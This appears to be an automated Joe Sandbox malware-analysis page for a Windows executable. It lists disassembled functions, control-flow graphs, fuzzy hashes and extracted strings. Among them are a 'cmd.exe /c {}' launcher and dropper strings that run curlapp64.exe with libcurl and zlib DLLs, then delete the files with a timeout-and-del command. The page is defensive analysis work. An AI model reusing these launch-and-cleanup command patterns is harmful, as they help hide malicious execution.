                                                                                                                                Function 00007FF712781F6C Relevance: 12.6, Strings: 10, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: AreFileApisANSI$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                                                                                • API String ID: 0-4046831456
                                                                                                                                • Opcode ID: 4648651d869071af5b244f8dcc525738f59b06bf52bef16704ee871bc6696625
                                                                                                                                • Instruction ID: 65bb0b2145c60e339eee60f3bdcd4ed5cacb7528bc953198150f2633b8ec1bb5
                                                                                                                                • Opcode Fuzzy Hash: 4648651d869071af5b244f8dcc525738f59b06bf52bef16704ee871bc6696625
                                                                                                                                • Instruction Fuzzy Hash: 3C41CD60909E8B91EE54FF54E8419F6A360BF0AB79BC84036D64C132A5EEBDB14DC361
                                                                                                                                Function 00007FF71277B328 Relevance: .2, Instructions: 207COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                • Opcode ID: 036507afea789f4ca378fad3564b5d86df9b0f9b51676445c7e9112fc193abf6
                                                                                                                                • Instruction ID: 2ab07cd785eeba4e535f61cea2731eb0a629a78b64e68c6a977f9d2302327891
                                                                                                                                • Opcode Fuzzy Hash: 036507afea789f4ca378fad3564b5d86df9b0f9b51676445c7e9112fc193abf6
                                                                                                                                • Instruction Fuzzy Hash: C7819F72A04E1186EB60EF25D48937E6360FB4ABA8F905636EF1E87794DF78D049C350
                                                                                                                                Function 00007FF7127643D0 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 234COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 7ff7127643d0-7ff712764517 call 7ff712763ad0 call 7ff712767f80 * 3 call 7ff712764170 * 3 call 7ff712769560 call 7ff712763fc0 19 7ff712764519-7ff71276452f 0->19 20 7ff71276454f-7ff7127645df call 7ff712763ad0 call 7ff712769560 call 7ff712763fc0 0->20 22 7ff71276454a call 7ff712773700 19->22 23 7ff712764531-7ff712764544 19->23 34 7ff7127645e4-7ff7127645ed 20->34 22->20 23->22 26 7ff7127647b9-7ff7127647be call 7ff71277b018 23->26 32 7ff7127647bf-7ff7127647c4 call 7ff71277b018 26->32 38 7ff7127647c5-7ff7127647eb call 7ff71277b018 call 7ff712768110 32->38 36 7ff712764626-7ff71276462e 34->36 37 7ff7127645ef-7ff712764606 34->37 41 7ff712764666-7ff71276466e 36->41 42 7ff712764630-7ff712764646 36->42 39 7ff712764608-7ff71276461b 37->39 40 7ff712764621 call 7ff712773700 37->40 39->32 39->40 40->36 43 7ff7127646a6-7ff7127646c1 41->43 44 7ff712764670-7ff712764686 41->44 47 7ff712764648-7ff71276465b 42->47 48 7ff712764661 call 7ff712773700 42->48 53 7ff7127646c3-7ff7127646d9 43->53 54 7ff712764701-7ff712764712 43->54 50 7ff712764688-7ff71276469b 44->50 51 7ff7127646a1 call 7ff712773700 44->51 47->38 47->48 48->41 50->51 55 7ff7127647b3-7ff7127647b8 call 7ff71277b018 50->55 51->43 58 7ff7127646db-7ff7127646ee 53->58 59 7ff7127646f4-7ff7127646f9 call 7ff712773700 53->59 60 7ff712764747-7ff712764760 54->60 61 7ff712764714-7ff71276472b 54->61 55->26 58->55 58->59 59->54 62 7ff712764794-7ff7127647b2 call 7ff7127736e0 60->62 63 7ff712764762-7ff712764778 60->63 67 7ff71276472d-7ff712764740 61->67 68 7ff712764742 call 7ff712773700 61->68 70 7ff71276477a-7ff71276478d 63->70 71 7ff71276478f call 7ff712773700 63->71 67->55 67->68 68->60 70->55 70->71 71->62
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00007FF712763A60: GetModuleHandleExW.KERNEL32 ref: 00007FF712763B33
                                                                                                                                  • Part of subcall function 00007FF712767F80: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7127680F0
                                                                                                                                  • Part of subcall function 00007FF712767F80: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7127680F6
                                                                                                                                  • Part of subcall function 00007FF712763FC0: CreateProcessW.KERNELBASE ref: 00007FF7127640DF
                                                                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7127647B3
                                                                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7127647B9
                                                                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7127647BF
                                                                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7127647C5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskCreateHandleModuleProcess
                                                                                                                                • String ID: %$\curlapp64.exe$\libcurl.dll$\zlib1.dll$start "" "{}"$timeout /t 10 /nobreak && del /q "{}"
                                                                                                                                • API String ID: 2619043766-39270516
                                                                                                                                • Opcode ID: 8c21315058eef4493dfde42d0d0aefbe0333b909fd3c08a8ac6ea77368981df9
                                                                                                                                • Instruction ID: 06c2ac8dcef4d436533d99787a6e7af8ddc2ce9acdfad3e82202907edd6173ea
                                                                                                                                • Opcode Fuzzy Hash: 8c21315058eef4493dfde42d0d0aefbe0333b909fd3c08a8ac6ea77368981df9
                                                                                                                                • Instruction Fuzzy Hash: 56B19762B14F4284FB10AB68E4453AEA361FB493B4F901231EB9C56AD9DFBCD18CC754
                                                                                                                                Function 00007FF712768110 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2081738530-0
                                                                                                                                • Opcode ID: 94f92c0075dfae4e7bae8e4b171b00ac0696060e85a7182d222d777efbacba36
                                                                                                                                • Instruction ID: 4f4f4d229b6b3bd2371fa9d851cd70a7ead57654a558e9c7d5b73e9afbabccbf
                                                                                                                                • Opcode Fuzzy Hash: 94f92c0075dfae4e7bae8e4b171b00ac0696060e85a7182d222d777efbacba36
                                                                                                                                • Instruction Fuzzy Hash: AA316061A08E0284FB25FF15E84416BA360FB997B4F880132DB5D43795DE7CE95DC324
                                                                                                                                Function 00007FF712763FC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107processCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseHandle$CreateProcess_invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: cmd.exe /c {}
                                                                                                                                • API String ID: 1307316983-3162138867
                                                                                                                                • Opcode ID: 4f5688e10adffc42376bc36b84a3ef4a92cabadf1495aa9546e9282660c1ec4d
                                                                                                                                • Instruction ID: c11aca76c3c6cd461ecf6113432b24b8c0170a49f0b10447b31ef2c76f6daee5
                                                                                                                                • Opcode Fuzzy Hash: 4f5688e10adffc42376bc36b84a3ef4a92cabadf1495aa9546e9282660c1ec4d
                                                                                                                                • Instruction Fuzzy Hash: F4417472E18F818AF710DF64E8503AEB371F799368F505625EB9C16A58EFB8D198C700
                                                                                                                                Function 00007FF712768910 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                • String ID: bad locale name
                                                                                                                                • API String ID: 2775327233-1405518554
                                                                                                                                • Opcode ID: 0424c622339be3c82e5fef6f301224a76fce907ed0b21c7aad3d63701308ba46
                                                                                                                                • Instruction ID: 47fdf90eb0b535dfe6ea08e811a81d638c2e2bd1cbab575ea9853392a93445f8
                                                                                                                                • Opcode Fuzzy Hash: 0424c622339be3c82e5fef6f301224a76fce907ed0b21c7aad3d63701308ba46
                                                                                                                                • Instruction Fuzzy Hash: 6A417F22B0AA4189FB14FFB0D4503AE62A4EF4A718F480434DF4D26A55CEB8D52DD368
                                                                                                                                Function 00007FF712780F3C Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 269 7ff712780f3c-7ff712780f61 270 7ff712781258 269->270 271 7ff712780f67-7ff712780f6a 269->271 272 7ff71278125a-7ff71278126a 270->272 273 7ff712780f6c-7ff712780f9e call 7ff71277af40 271->273 274 7ff712780fa3-7ff712780fcb 271->274 273->272 275 7ff712780fcd-7ff712780fd4 274->275 276 7ff712780fd6-7ff712780fdc 274->276 275->273 275->276 278 7ff712780fde-7ff712780fe7 call 7ff712783870 276->278 279 7ff712780fec-7ff712781003 call 7ff71278a064 276->279 278->279 284 7ff712781009-7ff712781012 279->284 285 7ff712781124-7ff71278113e 279->285 284->285 288 7ff712781018-7ff71278101b 284->288 286 7ff712781195-7ff7127811ba WriteFile 285->286 287 7ff712781140-7ff712781146 285->287 289 7ff7127811bc-7ff7127811c2 GetLastError 286->289 290 7ff7127811c5 286->290 291 7ff71278117e-7ff712781190 call 7ff7127809ec 287->291 292 7ff712781148-7ff71278114b 287->292 293 7ff71278102e-7ff712781039 288->293 294 7ff71278101d-7ff712781027 call 7ff71277c090 288->294 289->290 295 7ff7127811c8 290->295 312 7ff712781111-7ff712781118 291->312 296 7ff71278114d-7ff712781150 292->296 297 7ff71278116a-7ff71278117c call 7ff712780c10 292->297 299 7ff71278103b-7ff712781044 293->299 300 7ff71278104a-7ff712781062 GetConsoleMode 293->300 294->293 302 7ff7127811cd 295->302 303 7ff7127811d9-7ff7127811e3 296->303 304 7ff712781156-7ff712781168 call 7ff712780af4 296->304 297->312 299->285 299->300 307 7ff71278111d 300->307 308 7ff712781068-7ff71278106e 300->308 313 7ff7127811d2 302->313 314 7ff7127811e5-7ff7127811ea 303->314 315 7ff712781251-7ff712781256 303->315 304->312 307->285 310 7ff7127810fa-7ff71278110c call 7ff712780558 308->310 311 7ff712781074-7ff712781077 308->311 310->312 319 7ff712781079-7ff71278107c 311->319 320 7ff712781082-7ff712781090 311->320 312->302 313->303 321 7ff7127811ec-7ff7127811ef 314->321 322 7ff712781218-7ff712781232 314->322 315->272 319->313 319->320 320->295 326 7ff712781096 320->326 327 7ff712781208-7ff712781213 call 7ff71277b188 321->327 328 7ff7127811f1-7ff712781200 321->328 324 7ff712781239-7ff712781248 322->324 325 7ff712781234-7ff712781237 322->325 324->315 325->270 325->324 329 7ff71278109a-7ff7127810b1 call 7ff71278a0c4 326->329 327->322 328->327 334 7ff7127810ec-7ff7127810f5 GetLastError 329->334 335 7ff7127810b3-7ff7127810bf 329->335 334->295 336 7ff7127810de-7ff7127810e5 335->336 337 7ff7127810c1-7ff7127810d3 call 7ff71278a0c4 335->337 336->329 339 7ff7127810e7 336->339 337->334 341 7ff7127810d5-7ff7127810dc 337->341 339->295 341->336
                                                                                                                                APIs
                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF712780F27,?), ref: 00007FF71278105A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ConsoleMode
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4145635619-0
                                                                                                                                • Opcode ID: 6ba8d27c22b473721a1a14c23e4bd0d27965624397cd697b513ddc4e0b05cf70
                                                                                                                                • Instruction ID: 4564963a7972797496561674c3f059e98c150ff6e788a678cc2e844d57afb976
                                                                                                                                • Opcode Fuzzy Hash: 6ba8d27c22b473721a1a14c23e4bd0d27965624397cd697b513ddc4e0b05cf70
                                                                                                                                • Instruction Fuzzy Hash: 8591C722F18E5185FB51AF65A8412BEA7A0BB5A768F844135DF0E57684CEB8E44DC320
                                                                                                                                Function 00007FF71277385C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3251591375-0
                                                                                                                                • Opcode ID: 4ff4bdefbc55f34c7b5e543c71956096d91db1c7959ef7c5b2d421097c456a3a
                                                                                                                                • Instruction ID: 0165cba84e1b1ec69d6b92145090e2caf6c48b712d0b9f10c98da992ca220335
                                                                                                                                • Opcode Fuzzy Hash: 4ff4bdefbc55f34c7b5e543c71956096d91db1c7959ef7c5b2d421097c456a3a
                                                                                                                                • Instruction Fuzzy Hash: DC311A21E09E4241FA14BB65945A3BBA291AF4F764FC40438EB4E476D2DEECA90CC735
                                                                                                                                Function 00007FF712772AEC Relevance: 4.6, APIs: 3, Instructions: 66COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_Setgloballocalestd::locale::_
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2016263034-0
                                                                                                                                • Opcode ID: 5d8d2bf6e7179084e5c2b0f71ec74909b6f2433d0974f14e6a3337169ec52b91
                                                                                                                                • Instruction ID: e0b1a508a1fc980f26765fa990e40c2b05701320b476dc8fd2764ee92dfc9411
                                                                                                                                • Opcode Fuzzy Hash: 5d8d2bf6e7179084e5c2b0f71ec74909b6f2433d0974f14e6a3337169ec52b91
                                                                                                                                • Instruction Fuzzy Hash: 4C216D21A09E4685EB14FF22D85527AA760EB5EFA4F984035DB0D07361DF7CE88DC360
                                                                                                                                Function 00007FF71277CEA0 Relevance: 4.5, APIs: 3, Instructions: 13COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                • Opcode ID: 2e0b102997a663f87b82603eaa612d359689302552e43b248b4a8085f57861c4
                                                                                                                                • Instruction ID: 3f7058cfe0f3da3377613ee4f23f48330cc118f75b0de74f907be4ae3f00a4f9
                                                                                                                                • Opcode Fuzzy Hash: 2e0b102997a663f87b82603eaa612d359689302552e43b248b4a8085f57861c4
                                                                                                                                • Instruction Fuzzy Hash: 53D09E14B04E1647F6083B715C9A13B51125F5F721B941C3CDA4B06356CFED584C8361
                                                                                                                                Function 00007FF7127866DC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Info
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1807457897-3916222277
                                                                                                                                • Opcode ID: 7e12dfcac08929580308454bf1e9e9c4c76a006127b8af995ca6b0a52a3bd218
                                                                                                                                • Instruction ID: 3fd66997df9a4c8acedaed20606cf75fcffb5636d847e7a32491aa676a04537d
                                                                                                                                • Opcode Fuzzy Hash: 7e12dfcac08929580308454bf1e9e9c4c76a006127b8af995ca6b0a52a3bd218
                                                                                                                                • Instruction Fuzzy Hash: C651CE32A1CAC19AE7209F24E0853AEBBA0F74A754F94413AE78D43A45CFBCD05DCB50
                                                                                                                                Function 00007FF712781E00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: String
                                                                                                                                • String ID: LCMapStringEx
                                                                                                                                • API String ID: 2568140703-3893581201
                                                                                                                                • Opcode ID: 19ef9977d0df9c7175ddaa27e4bd11f584ddc70d43cb15f3d5f8649371260522
                                                                                                                                • Instruction ID: b20166b1d9d91586d655d17a1b8f779a8f6b752c39ce6b902ba6dc3ca5f62a7f
                                                                                                                                • Opcode Fuzzy Hash: 19ef9977d0df9c7175ddaa27e4bd11f584ddc70d43cb15f3d5f8649371260522
                                                                                                                                • Instruction Fuzzy Hash: 49214132A08F8586D660DB16B44066AB3A4FB8DBA4F844135EB9D83B99DF7CD458CB00
                                                                                                                                Function 00007FF712781924 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56memoryCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                • String ID: AppPolicyGetProcessTerminationMethod
                                                                                                                                • API String ID: 544645111-2031265017
                                                                                                                                • Opcode ID: ed41b519fe38b127c09c28c4a0b7d50585d795b6b13dfb462f190e66a516aee4
                                                                                                                                • Instruction ID: 1344869d7f20a9d247228bf4998811652f4885c1e8806f125e375c0b668785ae
                                                                                                                                • Opcode Fuzzy Hash: ed41b519fe38b127c09c28c4a0b7d50585d795b6b13dfb462f190e66a516aee4
                                                                                                                                • Instruction Fuzzy Hash: 1111B161A08A4A52EA28AB56B8015B6A250BB4DBB0F940330FF7C037D4DFBCE54DC720
                                                                                                                                Function 00007FF712786C78 Relevance: 3.2, APIs: 2, Instructions: 197COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00007FF7127865C4: GetOEMCP.KERNEL32 ref: 00007FF7127865EE
                                                                                                                                • IsValidCodePage.KERNEL32(?,?,?,?,?,00000000,?,00007FF712786A41), ref: 00007FF712786CF3
                                                                                                                                • GetCPInfo.KERNEL32(?,?,?,?,?,00000000,?,00007FF712786A41), ref: 00007FF712786D37
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CodeInfoPageValid
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 546120528-0
